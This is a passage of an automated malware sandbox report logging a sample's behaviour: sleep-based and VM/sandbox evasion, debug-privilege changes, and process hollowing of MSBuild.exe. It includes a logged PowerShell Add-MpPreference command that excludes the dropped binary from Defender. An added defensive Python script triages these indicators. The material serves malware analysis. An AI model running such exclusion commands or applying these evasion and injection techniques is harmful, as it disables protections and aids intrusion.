          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match | File source: 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR
          Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
          Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2720 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1284 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544 | Thread sleep time: -14757395258967632s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544 | Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544 | Thread sleep time: -720000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 1484 | Thread sleep time: -41226s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2452 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1448 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1224 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 808 | Thread sleep count: 60 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1256 | Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1056 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1184 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2868 | Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 672 | Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 672 | Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 804 | Thread sleep count: 8031 > 30
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 672 | Thread sleep time: -660000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 412 | Thread sleep time: -41226s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1796 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 236 | Thread sleep count: 60 > 30
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508 | Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508 | Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508 | Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 152 | Thread sleep time: -41226s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 1224 | Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2876 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 852 | Thread sleep count: 60 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 240000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 240000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 240000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Window / User API: threadDelayed 9399
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Window / User API: threadDelayed 8031
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Window / User API: threadDelayed 6595
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 240000
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 30000
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 41226
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 240000
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 30000
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 41226
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 240000
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 30000
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 41226
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Thread delayed: delay time: 30000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VBOXDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 0000001D.00000002.1030166755.000000000087D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware_S
          Source: explorer.exe, 0000001D.00000002.1030821479.00000000008E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARETSOFTWARE\Oracle\VirtualBox Guest Additions
          Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\NSYSTEM\ControlSet001\Services\Disk\Enum
          Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Process token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (2 identical entries)
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Memory allocated: page read and write | page guard
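
          Reading rows like the ones above by hand does not scale: the same SetErrorMode row is reported dozens of times per process, while the few rows that actually decide the verdict (the executable allocation and MZ-header write into MSBuild.exe and the Add-MpPreference exclusion, both listed under HIPS / PFW / Operating System Protection Evasion further down) sit among hundreds of low-signal ones. The Python below is an editorial example added to this page; it is not Joe Sandbox code and not part of the report. It parses rows in this report's "Source: ..." layout (fused or with a restored separator), applies the sleep threshold the rows themselves print, treats the Int64.MaxValue wait as low signal, matches the hypervisor and sandbox strings the report flagged, pairs the executable allocation with the MZ write into the same foreign image base as one hollowing chain, and ranks what is left. The sample rows are copied from this report; the weights, the ATT&CK ids in the labels, the VM marker list and the reading of the report's "s" suffix as milliseconds are this example's own assumptions.

```python
import re
from dataclasses import dataclass

# Detail column of a report row, found by keyword rather than by a separator so
# it also parses the raw extraction, where source and detail columns are fused.
DETAIL_RE = re.compile(
    r"(Binary or memory string|Thread sleep time|Thread sleep count|Process information set|"
    r"Process token adjusted|Process created|Memory allocated|Memory written): ?(.*)$"
)
SLEEP_RE = re.compile(r"-(\d+)s >= -(\d+)s")
COUNT_RE = re.compile(r"(\d+) > (\d+)")
INJECT_RE = re.compile(r"^(.*?) base: ([0-9A-Fa-f]+)(?: protect: (.*)| value starts with: (\w+))?$")
# Assumption: the report's "s" suffix is really milliseconds (60000 = one minute), and
# 922337203685477 is Int64.MaxValue in 100 ns ticks, i.e. the .NET infinite wait that
# PowerShell emits on its own, so by itself it proves nothing.
INFINITE_SLEEP = 922337203685477
# Strings only present on a hypervisor or sandbox host (assumed list, seeded from the
# strings this report matched; compared in upper case).
VM_MARKERS = ("SBIEDLL", "WINE_GET_UNIX_FILE_NAME", "VMWARE", "VBOX", "VIRTUALBOX")


@dataclass(frozen=True)
class Indicator:
    technique: str  # ATT&CK ids in the labels are this example's own mapping
    source: str     # process, thread or memory region the row came from
    detail: str
    weight: int     # assumed contribution to the verdict


def parse_line(line):
    """Split one 'Source: ...' row into (source, detail_kind, detail_value)."""
    m = DETAIL_RE.search(line) if line.startswith("Source: ") else None
    if not m:
        return None
    source = line[len("Source: "):m.start()].strip().rstrip("|").strip()
    return source, m.group(1), m.group(2).strip()


def classify(parsed):
    """Map one parsed row to an Indicator, or None when it carries no signal."""
    source, kind, value = parsed
    if kind == "Thread sleep time" and (m := SLEEP_RE.search(value)):
        delay, threshold = int(m.group(1)), int(m.group(2))  # threshold as printed by the report
        if delay == INFINITE_SLEEP:
            return Indicator("infinite wait (low signal)", source, value, 0)
        if delay >= threshold:
            return Indicator("T1497.003 time-based evasion: long sleep", source, value, 2)
    elif kind == "Thread sleep count" and (m := COUNT_RE.search(value)):
        if int(m.group(1)) > int(m.group(2)):
            return Indicator("T1497.003 time-based evasion: sleep loop", source, value, 2)
    elif kind == "Binary or memory string":
        if any(marker in value.upper() for marker in VM_MARKERS):
            return Indicator("T1497.001 system checks: VM/sandbox artifact string", source, value, 3)
    elif kind == "Process information set" and "NOOPENFILEERRORBOX" in value:
        # SetErrorMode(SEM_NOOPENFILEERRORBOX) hides error dialogs; .NET hosts such as
        # PowerShell set it routinely, so it is context rather than evidence.
        return Indicator("SetErrorMode suppresses error dialogs (low signal)", source, value, 0)
    elif kind == "Process token adjusted" and value == "Debug":
        return Indicator("SeDebugPrivilege enabled", source, value, 1)
    elif kind == "Process created" and "Add-MpPreference" in value and "-ExclusionPath" in value:
        return Indicator("T1562.001 Defender exclusion added", source, value, 5)
    return None  # Memory allocated/written rows are paired up in hollowing_chains()


def hollowing_chains(parsed_rows):
    """Pair an executable allocation with an MZ write at the same foreign image base;
    that is the process-hollowing pattern, and either half alone is not enough."""
    allocs, writes = set(), set()
    for source, kind, value in parsed_rows:
        m = INJECT_RE.match(value) if kind in ("Memory allocated", "Memory written") else None
        if not m:
            continue
        key = (source, m.group(1), int(m.group(2), 16))  # (injector, target image, base)
        if kind == "Memory allocated" and "execute" in (m.group(3) or ""):
            allocs.add(key)
        elif kind == "Memory written" and (m.group(4) or "").upper() == "4D5A":
            writes.add(key)
    return [Indicator("T1055.012 process hollowing: RWX alloc + MZ write in foreign process",
                      src, f"{target} @ {base:#x}", 5)
            for src, target, base in sorted(allocs & writes)]


def triage(lines):
    """Return (indicators ranked by weight, total score) for a list of report rows."""
    parsed = [p for p in (parse_line(row) for row in lines) if p]
    found = [i for i in (classify(p) for p in parsed) if i] + hollowing_chains(parsed)
    # The report repeats identical rows once per API call; count each distinct row
    # once so dozens of SetErrorMode rows cannot outweigh a single hollowing chain.
    unique = {(i.technique, i.source, i.detail): i for i in found}
    ranked = sorted(unique.values(), key=lambda i: -i.weight)
    return ranked, sum(i.weight for i in ranked)


# Constructed input: rows copied from the report sections on this page.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX",
    r"Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2720 | Thread sleep time: -60000s >= -30000s",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1284 | Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544 | Thread sleep time: -240000s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 804 | Thread sleep count: 8031 > 30",
    r"Source: C:\Users\user\AppData\Roaming\explorer.exe | Process token adjusted: Debug",
    r"Source: C:\Users\user\AppData\Roaming\explorer.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write",
    r"Source: C:\Users\user\AppData\Roaming\explorer.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A",
    r'Source: C:\Users\user\AppData\Roaming\explorer.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe',
]
```

          Calling triage(SAMPLE_LINES) ranks the hollowing chain and the Defender exclusion above everything else and folds repeated rows, so pasting the whole section in instead of the sample yields the same short list. The weights are deliberately crude and meant to be tuned against your own corpus; the structural point is that an allocation alone never counts as injection, only an allocation paired with a PE header written to the same base in the same target.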

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\AppData\Roaming\explorer.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write (3 identical entries)
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A (3 identical entries)
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe (6 identical entries)
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Injected file: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT was created by C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\notepad.exe | Injected file: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE (2 identical entries)
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 54F000
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 552000
          Source: C:\Users\user\AppData\Roaming\explorer.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 553000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 54F000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 552000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 553000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000
          Source: C:\Users\user\AppData\Roaming\explorer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000
